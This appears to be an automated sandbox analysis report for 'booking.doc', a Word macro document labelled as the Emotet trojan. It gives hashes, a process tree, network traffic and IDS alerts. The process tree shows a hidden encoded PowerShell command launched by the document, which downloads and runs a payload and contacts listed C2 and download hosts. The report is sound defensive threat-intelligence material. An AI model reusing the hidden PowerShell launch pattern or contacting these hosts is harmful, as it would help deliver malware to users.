File name: | booking.doc |
Full analysis: | https://app.any.run/tasks/7e7acdf7-e527-47c1-aa37-44161abc2ec4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 16, 2019, 09:28:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolore sunt a., Author: Laura Brehmer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 21:33:00 2019, Last Saved Time/Date: Fri Nov 15 21:33:00 2019, Number of Pages: 1, Number of Words: 21, Number of Characters: 121, Security: 0 |
MD5: | 45CF8F0BC99856BC508DF2242BF08DB1 |
SHA1: | 8539C7075E7060946E5774779429F0ADCEE08170 |
SHA256: | D115EB3832178142E9A59F565E63729F54E110CC963DC7F10B95F5BEFF943CB7 |
SSDEEP: | 3072:cxTyQH+UaqFh5Br/SzFaSadGBrjC48+WZ/POhh+/+qls5nIo:cxTyQHNaqjSzGdD48+aPOnX8s5n3 |
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Title: | Dolore sunt a. |
Subject: | - |
Author: | Laura Brehmer |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:11:15 21:33:00 |
ModifyDate: | 2019:11:15 21:33:00 |
Pages: | 1 |
Words: | 21 |
Characters: | 121 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 141 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\booking.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | | | | |
2332 | powershell -w hidden -enco … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
3884 | "C:\Windows\system32\taskmgr.exe" /4 | C:\Windows\system32\taskmgr.exe | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Task Manager; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
1916 | "C:\Users\admin\790.exe" | C:\Users\admin\790.exe | — | powershell.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
1904 | --4c25e06c | C:\Users\admin\790.exe | | 790.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
1096 | "C:\Windows\system32\taskmgr.exe" /1 | C:\Windows\system32\taskmgr.exe | | taskmgr.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Windows Task Manager; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
2420 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 790.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
792 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | | serialfunc.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
776 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | | explorer.exe |
User: admin; Integrity Level: HIGH; Exit code: 0 | | | | |
2960 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe |
User: admin; Integrity Level: HIGH; Exit code: 0 | | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA989.tmp.cvr | — | — | — |
2332 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LEY6PE5GSSD8KTLSF23L.temp | — | — | — |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF54138A0BEBDBB284.TMP | — | — | — |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFD45E5BDB595C7496.TMP | — | — | — |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFE756E671A6915448.TMP | — | — | — |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFA03CD3-2336-439E-8D62-C45CCD9FDBE4}.tmp | — | — | — |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFD3925797D5BFE187.TMP | — | — | — |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{70DBE3C5-8762-4A1D-B087-6A3122B52C4D}.tmp | — | — | — |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 2455C15589843C2EAC35FCC061519C34 | BC568529570B0DE768C51D903FF633EE4D7AF0B68F2109CC33CC6585744D0712 |
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\659D5A9.wmf | wmf | F66A5CB55DC953CEE945382BB4220A3D | 3A2D4B95C3DDA1E58CD02B6F157871DEE010C00CB6495D191EC069A3F6A9F21E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4032 | chrome.exe | GET | — | 195.21.56.7:80 | http://195.21.56.7/devices | GB | — | — | unknown |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/ | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/stubs/guids/ | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/stubs | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
792 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/devices/ | RU | binary | 132 b | malicious |
4032 | chrome.exe | GET | 200 | 103.2.116.76:80 | http://r1---sn-f5p5-hxae.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx?cms_redirect=yes&mip=85.203.20.5&mm=28&mn=sn-f5p5-hxae&ms=nvh&mt=1573896439&mv=m&mvi=0&pl=25&shardbypass=yes | AU | crx | 293 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2332 | powershell.exe | 138.117.149.13:443 | suarezcorredores.cl | Gtd Internet S.A. | CL | suspicious |
4032 | chrome.exe | 216.58.205.227:443 | www.google.com.ua | Google Inc. | US | whitelisted |
3100 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
4032 | chrome.exe | 172.217.18.110:443 | ogs.google.com | Google Inc. | US | whitelisted |
792 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
4032 | chrome.exe | 172.217.22.106:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
4032 | chrome.exe | 172.217.21.238:443 | clients2.google.com | Google Inc. | US | whitelisted |
4032 | chrome.exe | 172.217.16.163:443 | fonts.gstatic.com | Google Inc. | US | whitelisted |
4032 | chrome.exe | 216.58.208.45:443 | accounts.google.com | Google Inc. | US | whitelisted |
2332 | powershell.exe | 145.14.145.152:443 | water-cooled-cycles.000webhostapp.com | Hostinger International Limited | US | shared |
Domain | IP | Reputation |
---|---|---|
suarezcorredores.cl | | suspicious |
water-cooled-cycles.000webhostapp.com | | shared |
clientservices.googleapis.com | | whitelisted |
accounts.google.com | | shared |
www.google.com.ua | | whitelisted |
fonts.googleapis.com | | whitelisted |
www.gstatic.com | | whitelisted |
fonts.gstatic.com | | whitelisted |
apis.google.com | | whitelisted |
ogs.google.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
2332 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
792 | serialfunc.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
792 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3100 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |